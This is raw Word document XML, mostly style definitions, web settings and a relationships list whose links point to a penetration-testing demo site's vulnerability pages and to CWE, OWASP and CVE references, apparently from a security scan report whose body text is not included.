    <w:rsid w:val="00E00B8B"/>
    <w:rsid w:val="00E023F4"/>
    <w:rsid w:val="00E071DC"/>
    <w:rsid w:val="00E13155"/>
    <w:rsid w:val="00E1614D"/>
    <w:rsid w:val="00E3233C"/>
    <w:rsid w:val="00E37298"/>
    <w:rsid w:val="00E44C30"/>
    <w:rsid w:val="00E5077F"/>
    <w:rsid w:val="00E51C9B"/>
    <w:rsid w:val="00E54EB8"/>
    <w:rsid w:val="00E557EC"/>
    <w:rsid w:val="00E5643D"/>
    <w:rsid w:val="00E67B24"/>
    <w:rsid w:val="00E71D03"/>
    <w:rsid w:val="00E731AA"/>
    <w:rsid w:val="00E75698"/>
    <w:rsid w:val="00E83F3C"/>
    <w:rsid w:val="00E846EB"/>
    <w:rsid w:val="00E84842"/>
    <w:rsid w:val="00E940EF"/>
    <w:rsid w:val="00E96BBA"/>
    <w:rsid w:val="00EA65A4"/>
    <w:rsid w:val="00EA6DD9"/>
    <w:rsid w:val="00EB19F6"/>
    <w:rsid w:val="00EC0F5F"/>
    <w:rsid w:val="00EC5054"/>
    <w:rsid w:val="00EC77D0"/>
    <w:rsid w:val="00ED2A9F"/>
    <w:rsid w:val="00ED2F64"/>
    <w:rsid w:val="00ED3BCB"/>
    <w:rsid w:val="00ED7459"/>
    <w:rsid w:val="00EE5118"/>
    <w:rsid w:val="00EF47F0"/>
    <w:rsid w:val="00EF4BDE"/>
    <w:rsid w:val="00F01861"/>
    <w:rsid w:val="00F054EA"/>
    <w:rsid w:val="00F12CA8"/>
    <w:rsid w:val="00F1393B"/>
    <w:rsid w:val="00F14F0F"/>
    <w:rsid w:val="00F1609E"/>
    <w:rsid w:val="00F2294E"/>
    <w:rsid w:val="00F258AD"/>
    <w:rsid w:val="00F30980"/>
    <w:rsid w:val="00F31E1C"/>
    <w:rsid w:val="00F37715"/>
    <w:rsid w:val="00F417F8"/>
    <w:rsid w:val="00F443E4"/>
    <w:rsid w:val="00F4545A"/>
    <w:rsid w:val="00F5042D"/>
    <w:rsid w:val="00F56A40"/>
    <w:rsid w:val="00F61F58"/>
    <w:rsid w:val="00F678CE"/>
    <w:rsid w:val="00F8030E"/>
    <w:rsid w:val="00F82077"/>
    <w:rsid w:val="00F82820"/>
    <w:rsid w:val="00F861C0"/>
    <w:rsid w:val="00F95869"/>
    <w:rsid w:val="00FA6D0D"/>
    <w:rsid w:val="00FB09FB"/>
    <w:rsid w:val="00FB158C"/>
    <w:rsid w:val="00FB5600"/>
    <w:rsid w:val="00FB6EE1"/>
    <w:rsid w:val="00FD356A"/>
    <w:rsid w:val="00FD435C"/>
    <w:rsid w:val="00FE0455"/>
    <w:rsid w:val="00FF7452"/>
    <w:rsid w:val="00FF791B"/>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89AC"/>
  <w15:docId w15:val="{438A7130-8102-420B-9331-4FA62136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98"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="404040"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E37298"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="48"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E37298"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E37298"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E37298"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005E588B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005E588B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>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98"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E37298"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00540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E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0054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E3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00540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AE3"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="001B5544"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="434343"/>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style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00E37298"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4F81BD" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:after="300" w:line="240" w:lineRule="auto"/>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E37298"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="404040"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009F13B8"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E37298"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="00A91806"/>
    <w:pPr>
      <w:spacing w:after="140"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Noto Sans CJK SC Regular" w:hAnsi="Liberation Serif" w:cs="Lohit Devanagari"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="00A91806"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Noto Sans CJK SC Regular" w:hAnsi="Liberation Serif" w:cs="Lohit Devanagari"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00425689"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00425689"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00425689"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00425689"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>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character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00425689"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E37298"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="LightShading-Accent1">
    <w:name w:val="Light Shading Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="00E16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Codeblock">
    <w:name w:val="TableCodeblock"/>
    <w:basedOn w:val="DefaultTableStyle"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000F5F56"/>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Times New Roman (Body CS)"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-RO" w:eastAsia="en-GB"/>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A04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ubtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00E37298"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="160" w:after="160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:b/>
      <w:color w:val="737373"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:rsid w:val="00E37298"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Arial"/>
      <w:b/>
      <w:color w:val="737373"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="005E588B"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="005E588B"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003C3A9B"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="434343"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrayHeader">
    <w:name w:val="TableGrayHeader"/>
    <w:basedOn w:val="DefaultTableStyle"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000F5F56"/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="101" w:type="dxa"/>
        <w:left w:w="101" w:type="dxa"/>
        <w:bottom w:w="101" w:type="dxa"/>
        <w:right w:w="101" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:tcMar>
        <w:top w:w="245" w:type="dxa"/>
        <w:left w:w="245" w:type="dxa"/>
        <w:bottom w:w="245" w:type="dxa"/>
        <w:right w:w="245" w:type="dxa"/>
      </w:tcMar>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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ayFirstColumn">
    <w:name w:val="TableGrayFirstColumn"/>
    <w:basedOn w:val="DefaultTableStyle"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00FA6D0D"/>
    <w:tblPr>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cPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:noWrap/>
    </w:tcPr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:tr2bl w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="firstCol">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:sz w:val="24"/>
      </w:rPr>
      <w:tblPr>
        <w:tblCellMar>
          <w:top w:w="101" w:type="dxa"/>
          <w:left w:w="101" w:type="dxa"/>
          <w:bottom w:w="101" w:type="dxa"/>
          <w:right w:w="101" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        <w:tcMar>
          <w:top w:w="245" w:type="dxa"/>
          <w:left w:w="245" w:type="dxa"/>
          <w:bottom w:w="245" w:type="dxa"/>
          <w:right w:w="245" w:type="dxa"/>
        </w:tcMar>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:rPr>
        <w:i/>
        <w:iCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:tl2br w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          <w:tr2bl w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="DefaultTableStyle">
    <w:name w:val="DefaultTableStyle"/>
    <w:basedOn w:val="TableGrid1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000F5F56"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="404040"/>
      <w:sz w:val="24"/>
    </w:rPr>
    <w:tblPr>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CellMar>
        <w:top w:w="102" w:type="dxa"/>
        <w:left w:w="102" w:type="dxa"/>
        <w:bottom w:w="102" w:type="dxa"/>
        <w:right w:w="102" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:tcMar>
        <w:top w:w="244" w:type="dxa"/>
        <w:left w:w="244" w:type="dxa"/>
        <w:bottom w:w="244" w:type="dxa"/>
        <w:right w:w="244" w:type="dxa"/>
      </w:tcMa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281">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="664473828">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="10809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6989">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1728530909">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="16631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5466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1714385569">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="615914247">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="18451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8899">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1876625051">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="82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ntest-ground.com:4280/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/sqli_blind/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/xss_d/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/fi/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/w/page/13246936/Information%20Leakage" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/search/?searchString=A5-SecurityMisconfiguration%202021" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/README.md" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-21309" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-45145" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptt.eu-central-1.linodeobjects.com/ptt/9298ef87b1032e0b.txt" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-ground.com:4280/vulnerabilities/xss_s/" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/1004.html" TargetMode="External"/><Relationship Id="rId128" 